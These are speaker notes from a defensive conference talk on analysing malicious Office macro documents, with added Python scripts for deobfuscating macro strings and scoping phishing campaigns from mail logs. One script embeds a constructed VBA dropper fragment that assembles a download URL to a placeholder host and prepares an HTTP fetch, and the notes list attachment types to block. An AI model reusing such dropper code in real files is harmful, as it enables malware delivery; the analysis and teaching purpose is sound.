Malicious office document analysis for everyone!


Editor's Notes

  1. So, quick show of hands…no shame in your game, but whose current methodology for checking out malicious docs is to throw it on VirusTotal and just work from that analysis? That’s fine, but hopefully we’re going to level you up this morning. For a long time, that was my approach too. Drop the file on VT, maybe dig a little deeper and see what it was doing, or whether our AV was catching it, wash my hands and move on. Then one day I was taking a pentesting class with Dave Kennedy at Black Hat and he mentioned VT as a tool for attackers. That’s when my worldview shifted. Think of it this way: if you’re an attacker running a targeted attack, what better way to know whether those pesky IT folks are on to you than to query the VT API, watching for someone to upload the file? If it gets uploaded, shut down the operation and try again in a few weeks. So if you’re uploading to VT, you could be handing the attacker knowledge that you may not want them to have. Hold your cards as close as you can for as long as you can before you give them any information. NOTE: 99.99999999% of the time you’re going to be getting commodity malware that is just part of accepting email on the internet. However, it’s worth acting like it’s something more serious until you have evidence otherwise.
  2. When conducting any kind of analysis, your best path to success is to have a list of questions you want answered. Otherwise you can end up very deep in the weeds gathering info that just isn’t relevant to you or your operations. I’ve provided a few sample questions that I usually try to answer. Maybe these work for you, maybe there are other things you want to know. Q1: Are you sure none of your users are infected? Especially in the case of Office-document malware, it is almost never going to be caught by AV. The second stage might be, but without analysis you won’t know. Even if there are signatures at the time of analysis, depending on the lead time, your users may have been infected before the signature was deployed. Unless you look specifically for indicators of the malware, you can’t be certain about the health of your environment. Q2: Was the purpose to download a 2nd-stage malware? What was its purpose? Was this a commodity phish just trying to steal Gmail/Dropbox/Twitter creds? Is this a targeted phish looking to steal company credentials? These are all important questions to answer when determining how serious the threat truly is. Q3: Why did your users even get the email? Surely you’re running anti-spam protections. Hopefully you’re running an email firewall that you’ve dutifully tweaked to minimize your exposure. Why did it fail? What did this do that your current defenses missed? Is there something you can add in a broad sense to prevent this in the future?
  3. You should never perform any kind of malware analysis on a live system. In an ideal scenario you’d have two VMs: one local on your computer where you can run various static analysis tools, and another on a VPS that isn’t attributable to your organization. REMnux is a great distribution created by Lenny Zeltser that gets you a lot of good analysis tools straight out of the box. It provides plenty of tools to do the analysis we discuss here and a massive toolbox to expand your capabilities if you decide to go down that path. Locally, just a Windows VM with Office installed is probably your best bet. You can get free Windows VMs at modern.ie. There’s a time limit on the license, but if you revert before every analysis then you should be fine. You can also download a trial version of Office from Microsoft. That license will probably expire within 30 days, so your best bet would be to have a legit license. It can be tempting to run static analysis tools locally, but it’s really not advised: some tools can actually end up executing parts of the malware while processing it. You don’t want to have to write up the incident report about how you infected the company with ransomware. Another benefit of using a VM is that you can revert to a fresh snapshot for every piece of malware you analyze. If you really want to get fancy with it, you could have multiple snapshots with various versions of Office installed.
  4. It’s fine to find samples online and analyze them that way, and it’s even a decent way to learn, but you really should be analyzing stuff from your own environment as soon as you can. If you don’t already have a process in place to phish your employees, you should get that started ASAP. You should be phishing early and often. The more exposure your users have to it, the more opportunity you have to educate them about the warning signs and reinforce the behavior of reporting. There are a ton of options in this space, but to call out a couple: PhishMe is a good open source solution if you don’t have budget for a program like this or you just want to test the waters. If you want to up your game with a paid service, I really can’t recommend KnowBe4 enough. They have an excellent phishing platform tied to a user awareness program, and the price is really incredible considering the value. Once you have the phishing program in place, you want to do everything you can to encourage your users to forward the emails and not click. The best way I’ve found is through gamification. One approach I’ve used in the past: for every phishing campaign I initiated, I would track everyone that reported the email. Then at the end of the campaign I’d randomly select one of those reporters to get an Amazon gift card. This conditions users to forward a ton of emails hoping to catch a campaign you’ve initiated. You can also look into a “wall of shame” where you call out the departments that have the highest click percentages on your campaigns. No one wants to be the manager of that department! Also, make sure you train your users to forward emails as attachments. This lets you review the full original headers, leading to better analysis.
  5. So first things first: we’re going to do what I told you not to do and go to VirusTotal. BUT we’re not going to upload the file. We’re going to use the handy search function. You’ll need to generate the MD5 sum to search on, then just paste it in and search. If you’re lucky, someone else has already uploaded it and you can rest easy knowing it was likely just a massive spam wave. Check the comments and see if anyone has already found the indicators for it. If so, you’ve had a really easy case…you can search for the indicators, implement blocks and have a cup of coffee. As best I can tell, there’s no way to access the search history on VirusTotal, so a hash search is fairly safe from an OPSEC standpoint.
  6. So you didn’t get lucky…no one had submitted your file to VT. Now it’s time to pull back the covers on the file and see what’s really going on. For this, my go-to tool is OfficeMalScanner. This tool provides an easy interface to scan documents for embedded malicious content (less likely) and also to extract embedded macro code (most important). AV and traditional host-based prevention tech has basically rendered most truly malicious Office docs obsolete. In the last 3 years that I’ve spent looking at malicious Office docs, I’ve seen zero that are malicious in and of themselves. Every sample I’ve ever encountered has been a dropper that downloads a 2nd-stage malware and executes it. Occasionally it will also establish persistence for the 2nd stage, but most often it’s just download and execute. Just a note: the zip file on the website is password protected, and I’ve included the password here for reference.
  7. These are some of the common options for OfficeMalScanner. Generally the ‘info’ option is going to get you where you need to be. That will dump the macro code to a text file and you can dig in. Again, the ‘inflate’ option is there for documents like .docx, and ‘scan’/‘brute’ are mostly used for actual malicious documents. [Show demo of badstuff.doc]
  8. So now comes the real heavy lifting. No one says you have to be a programmer to take care of this mess. The main concept you need to understand is variables: set something to a name and give it a value. This can be used to set all of the pieces of a command out of order and just generally make things appear confusing. Another fun trick that sometimes is used is creating a function that just returns a string. Then the macro calls the functions in the right order and gets what it needs. This one is pretty simple to figure out if you just scan for telltale signs of URLs…looking for things like ‘http’, ‘://’ or ‘exe’. Generally once you find that thread you can backtrace through it all and reconstruct the download link, which is really what we’re looking for. Another common technique is to construct the VB script’s strings from ASCII codes. For this one, you really just have to put on some tunes and work through it piece by piece. It gets faster the more you do it, and once you start constructing strings you’ll know whether you’re on the right track or not. I’ve hacked together some PowerShell before to parse through long series of char codes, so that’s also certainly an option. [show example files]
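The same reconstruction, automated for the simple patterns just described (variables assembled out of order, functions that only return a string, and strings built from ASCII character codes), as an added example. This is not the speaker's code and was not part of the slides; the sample macro text, its variable and function names, and the domain in it are constructed for the example. Anything the helper cannot fold into a literal is left unresolved rather than guessed, which is the right behaviour when you are backtracing by hand as well.

```python
"""Resolve simple VBA string obfuscation and flag download indicators.

Added example: covers Chr() codes, '&' concatenation, variables assigned
out of order and functions that just return a string. Real macros use
more tricks; anything this cannot resolve is left unresolved.
"""
import re

# Constructed sample macro for this example; names and domain are invented.
SAMPLE_MACRO = r'''
Dim p1 As String, p2 As String
p2 = "://" & "upd" & "ate.exam" & "ple.test/"
p1 = Chr(104) & Chr(116) & Chr(116) & Chr(112)
Function Tail() As String
    Tail = "inv" & "oice" & Chr(46) & "e" & "xe"
End Function
target = p1 & p2 & Tail()
Set o = CreateObject("MSXML2.XMLHTTP")
o.Open "GET", target, False
'''

# name = expression   (also "Set name = expression")
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# Chr(104), ChrW(104), ChrB(104)
CHR_RE = re.compile(r'^Chr[WB]?\s*\(\s*(\d+)\s*\)$', re.IGNORECASE)
# a bare variable, or a call with no arguments such as Tail()
IDENT_RE = re.compile(r'^([A-Za-z_]\w*)\s*(?:\(\s*\))?$')
# the telltale fragments the talk says to scan for
INDICATORS = ('http', '://', '.exe')


def split_concat(expr):
    """Split an expression on '&' characters that are outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == '&' and not in_str:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return parts


def eval_token(tok, env):
    """Value of one token, or None if it cannot be resolved (yet)."""
    if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
        return tok[1:-1].replace('""', '"')      # VBA escapes a quote as ""
    m = CHR_RE.match(tok)
    if m:
        return chr(int(m.group(1)))
    m = IDENT_RE.match(tok)
    if m and m.group(1) in env:
        return env[m.group(1)]
    return None


def resolve_strings(macro):
    """Map every resolvable variable/function name to its final string value.

    Assignments are re-tried until nothing changes, so pieces defined out of
    order (or inside a Function body) still fold together.
    """
    assignments = []
    for line in macro.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            assignments.append((m.group(1), m.group(2)))
    env = {}
    changed = True
    while changed:
        changed = False
        for name, expr in assignments:
            if name in env:
                continue
            values = [eval_token(t, env) for t in split_concat(expr)]
            if all(v is not None for v in values):
                env[name] = ''.join(values)
                changed = True
    return env


def find_indicators(env):
    """Names whose resolved value contains one of the telltale fragments."""
    return {n: v for n, v in env.items()
            if any(i in v.lower() for i in INDICATORS)}


if __name__ == '__main__':
    resolved = resolve_strings(SAMPLE_MACRO)
    for name, value in find_indicators(resolved).items():
        print(f'{name} = {value!r}')
```

Run it on the dumped macro text from the ‘info’ step instead of the sample. The `CreateObject(...)` line stays unresolved on purpose: the point is to recover the strings, and the object calls around them tell you how the string was going to be used.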
  9. So now we’re at the main event. This is what the attacker was really trying to get onto our system. Again, we still don’t know if this is a targeted attack or commodity malware. We still need to practice safe OPSEC! This is where our VPS comes into play. Pull the file down with a browser or wget, and see what you end up with. Most of the time you’re going to get [filename].exe. Sometimes you’ll get [filename] because your initial macro was going to add the extension later. A quick pass with ‘file’ will let you know what you have. Now generate another MD5 hash and check VT. You’re almost certain to find someone has already uploaded it and can tell you exactly what you’ve got. If that’s the case, go ahead and try to download it over your corporate network and see if that 2nd-stage URL is being blocked yet. If you don’t find that 2nd stage on VT, you may have bigger problems. Malware is notoriously easy to modify to evade AV, so just because it isn’t there doesn’t mean it’s China. However, you’re now getting into territory beyond the scope of this talk. At this point you’ll probably want to engage an IR team if you have one. If you’ve got an MSSP, give them a call. This is going to require some pretty heavy reversing work.
  10. So now you’ve done all the fun stuff…now you have to do the stuff that pays the bills. Let’s answer some of those questions that your boss cares about. Who received the email? Check your mail logs looking for similar senders, similar subjects or similar attachments. Hopefully you can find the full reach of the campaign. Send off a friendly note to the users notifying them that they received a malicious doc/email, and kindly ask them to delete it. This is twofold. First, maybe you’re doing your analysis early in the AM (YOU SHOULD!) and you can notify your users before many of them even report for work. It’s also nice if you have UK offices, because they seem to catch and report the brunt of it just because of time zones. Second, it keeps you visible in the org and makes you seem like a friendly, helpful person instead of the security cop. In the email you send to users, it’s a good idea to include a clause asking them to notify you immediately if they opened the attachment or clicked the link. Then comes the IR. HOWEVER, users are not always so forthcoming with such info, especially when you’re just getting started. Everyone thinks they’re going to be scolded or even fired for making such a mistake. It’s important that instead of scolding, you just ask them to be a little more skeptical in the future and forward more emails to you before opening attachments. Obviously if you have repeat offenders then maybe you look into extra training or escalating to their manager, but tread carefully. So, since users may not want to share such information with you, you’ve got to dig into those logs. Check URL filtering logs for instances of the 2nd-stage URL. Check your firewall for any IPs you uncovered during your analysis. Trace that back to a user and…then comes the IR. Finally, after you’ve notified users and found any potential infections, go ahead and block the offending IPs and URLs. Best practice here may be to create special groups for these blocks. Since the hosts and websites used in malware campaigns tend to be compromised legitimate services, you may end up blocking functionality of a legitimate site. To limit that, consider expiring these blocks after 7-14 days. Malware campaigns often use their indicators for only a very short time, so it’s fairly unlikely that you’ll see the same stuff bubbling up again.
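The two log-driven pieces of that step, scoping who received the campaign and keeping the resulting blocks time-limited, as an added Python example (not the speaker's code). The gateway log format, the domains, the recipients and the attachment hashes are all constructed for the example; the only thing to change for real use is `LOG_RE`, which should match whatever your mail gateway actually writes.

```python
"""Scope a malicious-document campaign from mail logs and keep the
resulting indicator blocks time-limited.

Added example, not the speaker's code. The log format is invented for
the example; adapt LOG_RE to your gateway's real output.
"""
import re
from datetime import datetime, timedelta, timezone

# Constructed gateway log lines (made-up format, domains, users and hashes).
MAIL_LOG = """\
2024-05-06T07:12:03Z from=<billing@invoices.example> to=<alice@corp.example> subject="Invoice 4471" attach=invoice_4471.doc md5=0123456789abcdef0123456789abcdef
2024-05-06T07:12:09Z from=<billing@invoices.example> to=<bob@corp.example> subject="Invoice 4472" attach=invoice_4472.doc md5=0123456789abcdef0123456789abcdef
2024-05-06T07:15:41Z from=<hr@corp.example> to=<carol@corp.example> subject="Holiday schedule" attach=schedule.xlsx md5=fedcba9876543210fedcba9876543210
2024-05-06T07:20:00Z from=<accounts@invoices.example> to=<dave@corp.example> subject="Invoice 4473" attach=invoice_4473.doc md5=0123456789abcdef0123456789abcdef
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) from=<(?P<sender>[^>]*)> to=<(?P<rcpt>[^>]*)> '
    r'subject="(?P<subject>[^"]*)" attach=(?P<attach>\S+) md5=(?P<md5>[0-9a-f]{32})$'
)


def parse_ts(s):
    """Log timestamps are UTC in the form 2024-05-06T07:12:03Z."""
    return datetime.strptime(s, '%Y-%m-%dT%H:%M:%SZ').replace(tzinfo=timezone.utc)


def parse_log(text):
    """One dict per well-formed line; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def campaign_recipients(entries, md5=None, sender_domain=None, subject_prefix=None):
    """Users who got a message matching any of the supplied pivots.

    The attachment hash is the strongest pivot; sender domain and subject
    pattern catch variants where the attachment differs per recipient.
    """
    hits = set()
    for e in entries:
        same_hash = md5 is not None and e['md5'] == md5
        same_domain = sender_domain is not None and e['sender'].split('@')[-1] == sender_domain
        same_subject = subject_prefix is not None and e['subject'].startswith(subject_prefix)
        if same_hash or same_domain or same_subject:
            hits.add(e['rcpt'])
    return sorted(hits)


def add_block(blocks, indicator, added_at, ttl_days=14):
    """Record an indicator block with the 7-14 day expiry the talk suggests."""
    blocks[indicator] = parse_ts(added_at) + timedelta(days=ttl_days)
    return blocks


def active_blocks(blocks, now):
    """Indicators that should still be enforced at time `now` (ISO string)."""
    t = parse_ts(now)
    return sorted(ind for ind, expires in blocks.items() if expires > t)


if __name__ == '__main__':
    entries = parse_log(MAIL_LOG)
    print('notify:', campaign_recipients(entries, md5='0123456789abcdef0123456789abcdef'))
    blocks = add_block({}, 'invoices.example', entries[0]['ts'])
    print('active on 2024-05-13:', active_blocks(blocks, '2024-05-13T00:00:00Z'))
    print('active on 2024-05-21:', active_blocks(blocks, '2024-05-21T00:00:00Z'))
```

Pivoting on the hash alone misses the fourth message in the sample only if the attacker re-hashed it; pivoting on sender domain or subject pattern as well is what finds the full reach of the campaign. The expiry dictionary stands in for whatever block list or firewall group you actually push to.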
  11. So maybe you’ve made it through this talk and you’re thinking, “Doug, this is still all too hard. China doesn’t care about me, I’m going to throw everything at VirusTotal and online sandboxes and there’s nothing you can do about it”. Okay…feelings hurt, but I get it. AT LEAST consider implementing some of these quick wins. These things can often be implemented with just a light amount of research and are often “set it and forget it” solutions, but they will reduce your overall malware exposure fairly considerably. First quick win: “block commonly malicious files”. I’ve got a link here in the slides (which I’ll share at the end of the presentation) which lists various file formats that are commonly used for badness. Some of them are pretty easy, like .BAT, .SCR and .EXE. Hopefully you’re already blocking those at your email gateway. If not, maybe think about giving an IR firm a call, because you might have some unwanted guests. However, how many of you are blocking HTA? What about WSF? These are two lesser-known formats that I’ve personally seen used maliciously in the last month, and there is likely almost no reason these formats should ever make it through your email gateway. Some of them are obviously good ideas but, depending on your environment, may not be feasible to block. That leads to quick win #2: “change default file extensions”. So your IT team is shooting VB scripts and .js files through email all the time and there’s just no way you can block those files at the gateway…no way, no how. Okay, fine. Let’s at least dull those fangs a little and just change the default file association. Changing .js files to open by default in Notepad instead of Windows Script Host is a no-brainer. It’s likely that anyone regularly sharing these file formats through email is fairly technically literate. They can manually load the files using whatever they like, but a double-click is going to open them in Notepad. This has the potential for annoyances, so be sure to work WITH the business unit when developing policies like this. Finally, your biggest defense is always going to be users, so the third win is “encourage trust, but verify”. Users are not dumb. Say it with me this time…USERS ARE NOT DUMB. Your organization is likely full of extremely intelligent, creative folks. They may make some mistakes as it relates to security, but that’s not a slight on them; this stuff is hard. I mean, you’re attending a 3-day conference in which people spend all day talking about how to attack and how to defend. Even things that seem rudimentary to you are not necessarily obvious to someone who just wants to do their job. However, users can be trained. The key phrase to use is trust, but verify. Work on user awareness trainings and bulletins and flyers to hang in the office, drumming this concept into their heads. People should see you in the hallway and say “Hey look, it’s that trust but verify dude!” Encourage users to think critically about attachments and links they receive. If you get a file from someone, ask “Do I normally get files from this person? Is this a format they usually come in?” If either of those questions gives you pause, CALL THEM. That quick phone call will often not only allow you to confirm or deny legitimacy, but you’ll also be notifying them of a potential compromise of their email. Also encourage people to investigate issues that are cause for alarm, like invoices for extravagant goods or scammy account alert emails, by going to the company website directly instead of following links. This is hard work, for certain. There are entire companies built just around social engineering. There are many who are VERY good at this. However, with enough drilling and enough repetition, you may start to cause users to stop, pause and forward that email to you.
  12. Maybe some of you feel differently. Maybe this talk has been inspiring and has lit a fire for a passion for malware analysis that you never knew you had. GREAT! Here are some resources to use for further study. Practical Malware Analysis is really the standard bearer for books on malware analysis. This book will take you from nearly no knowledge to full-on reverse engineering by the end. It walks you through the steps to be taken when creating a malware analysis lab, basic static and dynamic analysis, and advanced static and dynamic analysis through the use of disassemblers and debuggers. You can really go as deep or as shallow as you want with this one, but every budding analyst should have it on their bookshelf. Also, Rensselaer Polytechnic Institute has a group called RPISEC and they’ve open sourced two fantastic courses that were taught at RPI. One is on modern binary exploitation, so do check that out if exploit dev is your cup of tea. The other was on malware analysis and is equally fantastic. The textbook for the course is the previously mentioned Practical Malware Analysis, but it presents the material in a more structured and expanded way. There are additional labs beyond what is present in the book. Finally, nearly every year Tyler Hudak, the creator of MASTIFF, offers an intro to malware analysis course here at DerbyCon. It may be offered at other cons, but he’s pretty reliably here. I’ve taken this course and it was a great exposure to basic static and dynamic analysis from a very knowledgeable researcher. He’s very passionate about his work and will gladly stay after for further explanation or for bonus material. When I took the course last year, we stayed for an extra hour at the end of the course and he gave a crash course on memory analysis that was fantastic.